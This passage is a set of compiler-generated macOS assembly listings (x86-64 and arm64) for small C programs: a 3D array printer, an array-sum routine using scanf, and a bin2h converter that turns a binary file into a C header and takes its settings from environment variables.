.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $80, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -68(%rbp) leaq -64(%rbp), %rdi leaq l___const.main.ary(%rip), %rsi movl $48, %edx callq _memcpy movl $0, -72(%rbp) LBB0_1: ## =>This Loop Header: Depth=1 ## Child Loop BB0_3 Depth 2 ## Child Loop BB0_5 Depth 3 cmpl $2, -72(%rbp) jge LBB0_12 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movl -72(%rbp), %esi addl $1, %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf movl $0, -76(%rbp) LBB0_3: ## Parent Loop BB0_1 Depth=1 ## => This Loop Header: Depth=2 ## Child Loop BB0_5 Depth 3 cmpl $3, -76(%rbp) jge LBB0_10 ## %bb.4: ## in Loop: Header=BB0_3 Depth=2 movl -76(%rbp), %esi addl $1, %esi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf movl $0, -80(%rbp) LBB0_5: ## Parent Loop BB0_1 Depth=1 ## Parent Loop BB0_3 Depth=2 ## => This Inner Loop Header: Depth=3 cmpl $2, -80(%rbp) jge LBB0_8 ## %bb.6: ## in Loop: Header=BB0_5 Depth=3 movl -80(%rbp), %esi addl $1, %esi leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf movslq -72(%rbp), %rcx leaq -64(%rbp), %rax imulq $24, %rcx, %rcx addq %rcx, %rax movslq -76(%rbp), %rcx shlq $3, %rcx addq %rcx, %rax movslq -80(%rbp), %rcx movl (%rax,%rcx,4), %esi leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf ## %bb.7: ## in Loop: Header=BB0_5 Depth=3 movl -80(%rbp), %eax addl $1, %eax movl %eax, -80(%rbp) jmp LBB0_5 LBB0_8: ## in Loop: Header=BB0_3 Depth=2 jmp LBB0_9 LBB0_9: ## in Loop: Header=BB0_3 Depth=2 movl -76(%rbp), %eax addl $1, %eax movl %eax, -76(%rbp) jmp LBB0_3 LBB0_10: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_11 LBB0_11: ## in Loop: Header=BB0_1 Depth=1 movl -72(%rbp), %eax addl $1, %eax movl %eax, -72(%rbp) jmp LBB0_1 LBB0_12: movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_14 ## %bb.13: xorl %eax, %eax addq $80, %rsp popq %rbp retq LBB0_14: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__const .p2align 4 ## @__const.main.ary l___const.main.ary: .long 1 ## 0x1 .long 2 ## 0x2 .long 3 ## 0x3 .long 4 ## 0x4 .long 5 ## 0x5 .long 6 ## 0x6 .long 7 ## 0x7 .long 8 ## 0x8 .long 9 ## 0x9 .long 10 ## 0xa .long 11 ## 0xb .long 12 ## 0xc .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "class %d\n" L_.str.1: ## @.str.1 .asciz " stu %d:\n" L_.str.2: ## @.str.2 .asciz " sub %d: " L_.str.3: ## @.str.3 .asciz "%d\n" .subsections_via_symbols
the_stack_data/75138537.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill .cfi_def_cfa_offset 16 mov x29, sp .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 sub sp, sp, #64 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] stur wzr, [x29, #-12] stur wzr, [x29, #-16] stur wzr, [x29, #-24] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf sub sp, sp, #16 mov x9, sp sub x8, x29, #20 str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf add sp, sp, #16 ldur w8, [x29, #-20] ; kill: def $x8 killed $w8 mov x9, sp stur x9, [x29, #-32] lsl x9, x8, #2 add x9, x9, #15 and x9, x9, #0xfffffffffffffff0 stur x9, [x29, #-56] ; 8-byte Folded Spill adrp x16, ___chkstk_darwin@GOTPAGE ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF] blr x16 ldur x10, [x29, #-56] ; 8-byte Folded Reload mov x9, sp subs x9, x9, x10 mov sp, x9 stur x9, [x29, #-48] ; 8-byte Folded Spill stur x8, [x29, #-40] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-16] ldur w9, [x29, #-20] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_4 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldur w9, [x29, #-16] ; implicit-def: $x8 mov x8, x9 sub sp, sp, #16 mov x9, sp str x8, [x9] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf ldur x8, [x29, #-48] ; 8-byte Folded Reload add sp, sp, #16 ldursw x9, [x29, #-16] add x8, x8, x9, lsl #2 sub sp, sp, #16 mov x9, sp str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf ldur x8, [x29, #-48] ; 8-byte Folded Reload add sp, sp, #16 ldursw x9, [x29, #-16] ldr w9, [x8, x9, lsl #2] ldur w8, [x29, #-24] add w8, w8, w9 stur w8, [x29, #-24] b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-16] add w8, w8, #1 stur w8, [x29, #-16] b LBB0_1 LBB0_4: ldur w9, [x29, #-24] ; implicit-def: $x8 mov x8, x9 sub sp, sp, #16 mov x9, sp str x8, [x9] adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf add sp, sp, #16 ldur x8, [x29, #-32] mov sp, x8 ldur w8, [x29, #-12] stur w8, [x29, #-60] ; 4-byte Folded Spill ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_6 b LBB0_5 LBB0_5: bl ___stack_chk_fail LBB0_6: ldur w0, [x29, #-60] ; 4-byte Folded Reload mov sp, x29 ldp x29, x30, [sp], #16 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Enter the size of the array = " l_.str.1: ; @.str.1 .asciz "%d" l_.str.2: ; @.str.2 .asciz "Element - %d = " l_.str.3: ; @.str.3 .asciz "Sum of the elements in the array is = %d" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $64, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -12(%rbp) movl $0, -16(%rbp) movl $0, -24(%rbp) leaq L_.str(%rip), %rdi xorl %eax, %eax ## kill: def $al killed $al killed $eax movb %al, -57(%rbp) ## 1-byte Spill callq _printf ## kill: def $ecx killed $eax movb -57(%rbp), %al ## 1-byte Reload leaq L_.str.1(%rip), %rdi leaq -20(%rbp), %rsi callq _scanf movl -20(%rbp), %eax ## kill: def $rax killed $eax movq %rax, -56(%rbp) ## 8-byte Spill movq %rsp, %rcx movq %rcx, -32(%rbp) shlq $2, %rax callq ____chkstk_darwin addq $15, %rax andq $-16, %rax subq %rax, %rsp movq -56(%rbp), %rax ## 8-byte Reload movq %rsp, %rcx movq %rcx, -48(%rbp) ## 8-byte Spill movq %rax, -40(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 movl -16(%rbp), %eax cmpl -20(%rbp), %eax jge LBB0_4 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movl -16(%rbp), %esi leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf movq -48(%rbp), %rsi ## 8-byte Reload movslq -16(%rbp), %rax shlq $2, %rax addq %rax, %rsi leaq L_.str.1(%rip), %rdi movb $0, %al callq _scanf ## kill: def $ecx killed $eax movq -48(%rbp), %rax ## 8-byte Reload movslq -16(%rbp), %rcx movl (%rax,%rcx,4), %eax addl -24(%rbp), %eax movl %eax, -24(%rbp) ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB0_1 LBB0_4: movl -24(%rbp), %esi leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf movq -32(%rbp), %rax movq %rax, %rsp movl -12(%rbp), %eax movl %eax, -64(%rbp) ## 4-byte Spill movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_6 ## %bb.5: movl -64(%rbp), %eax ## 4-byte Reload movq %rbp, %rsp popq %rbp retq LBB0_6: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Enter the size of the array = " L_.str.1: ## @.str.1 .asciz "%d" L_.str.2: ## @.str.2 .asciz "Element - %d = " L_.str.3: ## @.str.3 .asciz "Sum of the elements in the array is = %d" .subsections_via_symbols
the_stack_data/80420.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _bin2h ; -- Begin function bin2h .p2align 2 _bin2h: ; @bin2h .cfi_startproc ; %bb.0: sub sp, sp, #128 .cfi_def_cfa_offset 128 stp x29, x30, [sp, #112] ; 16-byte Folded Spill add x29, sp, #112 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-16] stur x1, [x29, #-24] stur x2, [x29, #-32] stur x3, [x29, #-40] stur wzr, [x29, #-44] str wzr, [sp, #40] ldur x0, [x29, #-16] adrp x1, l_.str@PAGE add x1, x1, l_.str@PAGEOFF bl _fopen str x0, [sp, #56] ldr x8, [sp, #56] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: ldur x8, [x29, #-16] mov x9, sp str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf mov w8, #-1 stur w8, [x29, #-4] b LBB0_16 LBB0_2: ldur x0, [x29, #-24] ldur x1, [x29, #-40] bl _fopen str x0, [sp, #48] ldr x8, [sp, #48] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: ldur x8, [x29, #-24] mov x9, sp str x8, [x9] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf ldr x0, [sp, #56] bl _fclose mov w8, #-1 stur w8, [x29, #-4] b LBB0_16 LBB0_4: ldr x1, [sp, #48] adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF str x0, [sp, #16] ; 8-byte Folded Spill bl _fputs ldr x0, [sp, #16] ; 8-byte Folded Reload ldr x1, [sp, #48] bl _fputs ldr x1, [sp, #48] adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF str x0, [sp, #24] ; 8-byte Folded Spill bl _fputs ldr x0, [sp, #24] ; 8-byte Folded Reload ldr x1, [sp, #48] bl _fputs ldr x0, [sp, #48] ldur x8, [x29, #-32] mov x9, sp str x8, [x9] adrp x1, l_.str.5@PAGE add x1, x1, l_.str.5@PAGEOFF bl _fprintf b LBB0_5 LBB0_5: ; =>This Inner Loop Header: Depth=1 ldr x0, [sp, #56] bl _getc strb w0, [sp, #47] ldr x0, [sp, #56] bl _feof subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB0_7 b LBB0_6 LBB0_6: b LBB0_15 LBB0_7: ; in Loop: Header=BB0_5 Depth=1 strh wzr, [sp, #36] ldr w8, [sp, #40] subs w8, w8, #16 cset w8, lt tbnz w8, #0, LBB0_9 b LBB0_8 LBB0_8: ; in Loop: Header=BB0_5 Depth=1 ldr x1, [sp, #48] adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _fputs str wzr, [sp, #40] b LBB0_9 LBB0_9: ; in Loop: Header=BB0_5 Depth=1 ldr w8, [sp, #40] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB0_11 b LBB0_10 LBB0_10: ; in Loop: Header=BB0_5 Depth=1 ldr x1, [sp, #48] adrp x0, l_.str.6@PAGE add x0, x0, l_.str.6@PAGEOFF bl _fputs b LBB0_14 LBB0_11: ; in Loop: Header=BB0_5 Depth=1 ldr w8, [sp, #40] subs w8, w8, #16 cset w8, ge tbnz w8, #0, LBB0_13 b LBB0_12 LBB0_12: ; in Loop: Header=BB0_5 Depth=1 ldr x1, [sp, #48] adrp x0, l_.str.7@PAGE add x0, x0, l_.str.7@PAGEOFF bl _fputs b LBB0_13 LBB0_13: ; in Loop: Header=BB0_5 Depth=1 b LBB0_14 LBB0_14: ; in Loop: Header=BB0_5 Depth=1 ldr x1, [sp, #48] adrp x0, l_.str.8@PAGE add x0, x0, l_.str.8@PAGEOFF bl _fputs ldrb w10, [sp, #47] mov x9, sp ; implicit-def: $x8 mov x8, x10 str x8, [x9] add x0, sp, #36 str x0, [sp, #8] ; 8-byte Folded Spill mov w1, #0 mov x2, #3 adrp x3, l_.str.9@PAGE add x3, x3, l_.str.9@PAGEOFF bl ___sprintf_chk ldr x0, [sp, #8] ; 8-byte Folded Reload ldr x1, [sp, #48] bl _fputs ldr x1, [sp, #48] adrp x0, l_.str.10@PAGE add x0, x0, l_.str.10@PAGEOFF bl _fputs ldr w8, [sp, #40] add w8, w8, #1 str w8, [sp, #40] b LBB0_5 LBB0_15: ldr x1, [sp, #48] adrp x0, l_.str.11@PAGE add x0, x0, l_.str.11@PAGEOFF bl _fputs ldr x0, [sp, #56] bl _fclose ldr x0, [sp, #48] bl _fclose b LBB0_16 LBB0_16: ldur w0, [x29, #-4] ldp x29, x30, [sp, #112] ; 16-byte Folded Reload add sp, sp, #128 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 mov w9, #12192 adrp x16, ___chkstk_darwin@GOTPAGE ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF] blr x16 sub sp, sp, #2, lsl #12 ; =8192 sub sp, sp, #4000 add x8, sp, #2944 str x8, [sp, #504] ; 8-byte Folded Spill adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-24] str wzr, [sp, #616] str w0, [sp, #612] str x1, [sp, #600] str wzr, [sp, #532] str wzr, [sp, #528] str wzr, [sp, #524] str wzr, [sp, #520] str wzr, [sp, #516] adrp x0, l_.str.12@PAGE add x0, x0, l_.str.12@PAGEOFF bl _getenv str x0, [sp, #592] adrp x0, l_.str.13@PAGE add x0, x0, l_.str.13@PAGEOFF bl _getenv str x0, [sp, #584] adrp x0, l_.str.14@PAGE add x0, x0, l_.str.14@PAGEOFF bl _getenv str x0, [sp, #576] adrp x0, l_.str.15@PAGE add x0, x0, l_.str.15@PAGEOFF bl _getenv str x0, [sp, #560] adrp x0, l_.str.16@PAGE add x0, x0, l_.str.16@PAGEOFF bl _getenv str x0, [sp, #544] adrp x0, l_.str.17@PAGE add x0, x0, l_.str.17@PAGEOFF bl _getenv str x0, [sp, #536] adrp x0, l_.str.18@PAGE add x0, x0, l_.str.18@PAGEOFF bl _getenv str x0, [sp, #552] ldr x8, [sp, #592] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB1_2 b LBB1_1 LBB1_1: adrp x0, l_.str.19@PAGE add x0, x0, l_.str.19@PAGEOFF bl _printf mov w8, #-1 str w8, [sp, #616] b LBB1_61 LBB1_2: ldr x8, [sp, #584] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB1_4 b LBB1_3 LBB1_3: adrp x0, l_.str.20@PAGE add x0, x0, l_.str.20@PAGEOFF bl _printf mov w8, #-1 str w8, [sp, #616] b LBB1_61 LBB1_4: ldr x8, [sp, #576] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB1_6 b LBB1_5 LBB1_5: adrp x0, l_.str.21@PAGE add x0, x0, l_.str.21@PAGEOFF bl _printf mov w8, #-1 str w8, [sp, #616] b LBB1_61 LBB1_6: ldr x8, [sp, #552] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB1_8 b LBB1_7 LBB1_7: ldr x10, [sp, #576] ldr x8, [sp, #552] mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x0, l_.str.22@PAGE add x0, x0, l_.str.22@PAGEOFF bl _printf b LBB1_8 LBB1_8: add x0, sp, #2968 str x0, [sp, #496] ; 8-byte Folded Spill mov x1, #1024 str x1, [sp, #488] ; 8-byte Folded Spill bl _bzero ldr x8, [sp, #576] str x8, [sp, #480] ; 8-byte Folded Spill ldr x0, [sp, #576] bl _strlen ldr x1, [sp, #480] ; 8-byte Folded Reload ldr x3, [sp, #488] ; 8-byte Folded Reload mov x2, x0 ldr x0, [sp, #496] ; 8-byte Folded Reload bl ___memcpy_chk ldr x0, [sp, #576] bl _strlen ldr x8, [sp, #496] ; 8-byte Folded Reload add x8, x8, x0 strb wzr, [x8] ldr x8, [sp, #544] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB1_10 b LBB1_9 LBB1_9: adrp x0, l_.str.23@PAGE add x0, x0, l_.str.23@PAGEOFF bl _printf mov w8, #-1 str w8, [sp, #616] b LBB1_61 LBB1_10: ldr x0, [sp, #544] bl _strlen subs x8, x0, #19 cset w8, ls tbnz w8, #0, LBB1_12 b LBB1_11 LBB1_11: adrp x0, l_.str.24@PAGE add x0, x0, l_.str.24@PAGEOFF bl _printf mov w8, #-1 str w8, [sp, #616] b LBB1_61 LBB1_12: ldr x8, [sp, #504] ; 8-byte Folded Reload add x9, sp, #2944 str x9, [sp, #472] ; 8-byte Folded Spill str xzr, [x8] str xzr, [x8, #8] str wzr, [sp, #2960] ldr x8, [sp, #544] str x8, [sp, #464] ; 8-byte Folded Spill ldr x0, [sp, #544] bl _strlen ldr x1, [sp, #464] ; 8-byte Folded Reload mov x2, x0 ldr x0, [sp, #472] ; 8-byte Folded Reload mov x3, #20 bl ___memcpy_chk ldr x0, [sp, #544] bl _strlen ldr x8, [sp, #472] ; 8-byte Folded Reload add x8, x8, x0 strb wzr, [x8] ldr x8, [sp, #536] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB1_14 b LBB1_13 LBB1_13: adrp x0, l_.str.25@PAGE add x0, x0, l_.str.25@PAGEOFF bl _printf mov w8, #-1 str w8, [sp, #616] b LBB1_61 LBB1_14: ldr x0, [sp, #536] bl _strlen subs x8, x0, #19 cset w8, ls tbnz w8, #0, LBB1_16 b LBB1_15 LBB1_15: adrp x0, l_.str.26@PAGE add x0, x0, l_.str.26@PAGEOFF bl _printf mov w8, #-1 str w8, [sp, #616] b LBB1_61 LBB1_16: ldr x8, [sp, #536] str x8, [sp, #448] ; 8-byte Folded Spill ldr x0, [sp, #536] bl _strlen ldr x1, [sp, #448] ; 8-byte Folded Reload mov x2, x0 add x0, sp, #2924 str x0, [sp, #456] ; 8-byte Folded Spill mov x3, #20 bl ___memcpy_chk ldr x0, [sp, #536] bl _strlen ldr x8, [sp, #456] ; 8-byte Folded Reload add x8, x8, x0 strb wzr, [x8] ldr x0, [sp, #592] bl _strlen subs x8, x0, #412 cset w8, ls tbnz w8, #0, LBB1_18 b LBB1_17 LBB1_17: adrp x0, l_.str.27@PAGE add x0, x0, l_.str.27@PAGEOFF bl _printf mov w8, #-1 str w8, [sp, #616] b LBB1_61 LBB1_18: ldr x0, [sp, #584] bl _strlen subs x8, x0, #412 cset w8, ls tbnz w8, #0, LBB1_20 b LBB1_19 LBB1_19: adrp x0, l_.str.28@PAGE add x0, x0, l_.str.28@PAGEOFF bl _printf mov w8, #-1 str w8, [sp, #616] b LBB1_61 LBB1_20: ldr x0, [sp, #576] bl _strlen mov x9, x0 add x0, sp, #2968 mov x8, x0 add x8, x8, x9 strb wzr, [x8] adrp x1, l_.str.7@PAGE add x1, x1, l_.str.7@PAGEOFF bl _strtok str x0, [sp, #576] b LBB1_21 LBB1_21: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #576] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB1_60 b LBB1_22 LBB1_22: ; in Loop: Header=BB1_21 Depth=1 ldr x8, [sp, #576] mov x9, sp str x8, [x9] adrp x0, l_.str.29@PAGE add x0, x0, l_.str.29@PAGEOFF bl _printf add x0, sp, #2, lsl #12 ; =8192 add x0, x0, #3480 str x0, [sp, #368] ; 8-byte Folded Spill mov x1, #512 str x1, [sp, #432] ; 8-byte Folded Spill bl _bzero ldr x1, [sp, #432] ; 8-byte Folded Reload add x0, sp, #2, lsl #12 ; =8192 add x0, x0, #408 str x0, [sp, #376] ; 8-byte Folded Spill bl _bzero ldr x1, [sp, #432] ; 8-byte Folded Reload add x0, sp, #1, lsl #12 ; =4096 add x0, x0, #3992 str x0, [sp, #384] ; 8-byte Folded Spill bl _bzero ldr x1, [sp, #432] ; 8-byte Folded Reload add x0, sp, #2, lsl #12 ; =8192 add x0, x0, #920 str x0, [sp, #392] ; 8-byte Folded Spill bl _bzero ldr x1, [sp, #432] ; 8-byte Folded Reload add x0, sp, #2, lsl #12 ; =8192 add x0, x0, #2968 str x0, [sp, #400] ; 8-byte Folded Spill bl _bzero ldr x1, [sp, #432] ; 8-byte Folded Reload add x0, sp, #1388 bl _bzero ldr x1, [sp, #432] ; 8-byte Folded Reload add x0, sp, #876 bl _bzero ldr x1, [sp, #432] ; 8-byte Folded Reload add x0, sp, #1, lsl #12 ; =4096 add x0, x0, #3480 str x0, [sp, #288] ; 8-byte Folded Spill bl _bzero ldr x1, [sp, #432] ; 8-byte Folded Reload add x0, sp, #1, lsl #12 ; =4096 add x0, x0, #408 str x0, [sp, #296] ; 8-byte Folded Spill bl _bzero ldr x1, [sp, #432] ; 8-byte Folded Reload add x0, sp, #3992 str x0, [sp, #304] ; 8-byte Folded Spill bl _bzero ldr x1, [sp, #432] ; 8-byte Folded Reload add x0, sp, #1, lsl #12 ; =4096 add x0, x0, #920 str x0, [sp, #360] ; 8-byte Folded Spill bl _bzero ldr x1, [sp, #432] ; 8-byte Folded Reload add x0, sp, #1, lsl #12 ; =4096 add x0, x0, #2968 str x0, [sp, #312] ; 8-byte Folded Spill bl _bzero add x0, sp, #2796 mov w1, #0 str w1, [sp, #276] ; 4-byte Folded Spill mov x2, #128 str x2, [sp, #280] ; 8-byte Folded Spill bl _memset ldr w1, [sp, #276] ; 4-byte Folded Reload ldr x2, [sp, #280] ; 8-byte Folded Reload add x0, sp, #2156 bl _memset ldr w1, [sp, #276] ; 4-byte Folded Reload ldr x2, [sp, #280] ; 8-byte Folded Reload add x0, sp, #2028 bl _memset ldr w1, [sp, #276] ; 4-byte Folded Reload ldr x2, [sp, #280] ; 8-byte Folded Reload add x0, sp, #1900 bl _memset ldr w1, [sp, #276] ; 4-byte Folded Reload ldr x2, [sp, #280] ; 8-byte Folded Reload add x0, sp, #2668 bl _memset ldr w1, [sp, #276] ; 4-byte Folded Reload ldr x2, [sp, #280] ; 8-byte Folded Reload add x0, sp, #748 bl _memset ldr w1, [sp, #276] ; 4-byte Folded Reload ldr x2, [sp, #280] ; 8-byte Folded Reload add x0, sp, #620 bl _memset ldr x1, [sp, #432] ; 8-byte Folded Reload add x0, sp, #2, lsl #12 ; =8192 add x0, x0, #2456 str x0, [sp, #408] ; 8-byte Folded Spill bl _bzero ldr x1, [sp, #432] ; 8-byte Folded Reload add x0, sp, #2, lsl #12 ; =8192 add x0, x0, #1944 str x0, [sp, #416] ; 8-byte Folded Spill bl _bzero ldr x1, [sp, #432] ; 8-byte Folded Reload add x0, sp, #2, lsl #12 ; =8192 add x0, x0, #1432 str x0, [sp, #440] ; 8-byte Folded Spill bl _bzero ldr x1, [sp, #432] ; 8-byte Folded Reload add x0, sp, #1, lsl #12 ; =4096 add x0, x0, #2456 str x0, [sp, #320] ; 8-byte Folded Spill bl _bzero ldr x1, [sp, #432] ; 8-byte Folded Reload add x0, sp, #1, lsl #12 ; =4096 add x0, x0, #1944 str x0, [sp, #328] ; 8-byte Folded Spill bl _bzero ldr x1, [sp, #432] ; 8-byte Folded Reload add x0, sp, #1, lsl #12 ; =4096 add x0, x0, #1432 str x0, [sp, #336] ; 8-byte Folded Spill bl _bzero ldr w1, [sp, #276] ; 4-byte Folded Reload ldr x2, [sp, #280] ; 8-byte Folded Reload add x0, sp, #2540 bl _memset ldr w1, [sp, #276] ; 4-byte Folded Reload ldr x2, [sp, #280] ; 8-byte Folded Reload add x0, sp, #2412 bl _memset ldr w1, [sp, #276] ; 4-byte Folded Reload ldr x2, [sp, #280] ; 8-byte Folded Reload add x0, sp, #2284 bl _memset ldr x0, [sp, #368] ; 8-byte Folded Reload ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x1, [sp, #584] bl ___strcat_chk ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #376] ; 8-byte Folded Reload ldr x1, [sp, #584] bl ___strcat_chk ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #384] ; 8-byte Folded Reload ldr x1, [sp, #584] bl ___strcat_chk ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #392] ; 8-byte Folded Reload ldr x1, [sp, #584] bl ___strcat_chk ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #400] ; 8-byte Folded Reload ldr x1, [sp, #584] bl ___strcat_chk ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #408] ; 8-byte Folded Reload ldr x1, [sp, #584] bl ___strcat_chk ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #416] ; 8-byte Folded Reload ldr x1, [sp, #584] bl ___strcat_chk ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #440] ; 8-byte Folded Reload ldr x1, [sp, #584] bl ___strcat_chk ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #288] ; 8-byte Folded Reload ldr x1, [sp, #592] bl ___strcat_chk ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #296] ; 8-byte Folded Reload ldr x1, [sp, #592] bl ___strcat_chk ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #304] ; 8-byte Folded Reload ldr x1, [sp, #592] bl ___strcat_chk ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #360] ; 8-byte Folded Reload ldr x1, [sp, #592] bl ___strcat_chk ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #312] ; 8-byte Folded Reload ldr x1, [sp, #592] bl ___strcat_chk ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #320] ; 8-byte Folded Reload ldr x1, [sp, #592] bl ___strcat_chk ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #328] ; 8-byte Folded Reload ldr x1, [sp, #592] bl ___strcat_chk ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #336] ; 8-byte Folded Reload ldr x1, [sp, #592] bl ___strcat_chk ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #368] ; 8-byte Folded Reload str wzr, [sp, #532] str wzr, [sp, #528] str wzr, [sp, #524] adrp x1, l_.str.30@PAGE add x1, x1, l_.str.30@PAGEOFF str x1, [sp, #344] ; 8-byte Folded Spill bl ___strcat_chk ldr x1, [sp, #344] ; 8-byte Folded Reload ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #376] ; 8-byte Folded Reload bl ___strcat_chk ldr x1, [sp, #344] ; 8-byte Folded Reload ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #384] ; 8-byte Folded Reload bl ___strcat_chk ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #288] ; 8-byte Folded Reload adrp x1, l_.str.31@PAGE add x1, x1, l_.str.31@PAGEOFF str x1, [sp, #352] ; 8-byte Folded Spill bl ___strcat_chk ldr x1, [sp, #352] ; 8-byte Folded Reload ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #296] ; 8-byte Folded Reload bl ___strcat_chk ldr x1, [sp, #352] ; 8-byte Folded Reload ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #304] ; 8-byte Folded Reload bl ___strcat_chk ldr x1, [sp, #344] ; 8-byte Folded Reload ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #400] ; 8-byte Folded Reload bl ___strcat_chk ldr x2, [sp, #432] ; 8-byte Folded 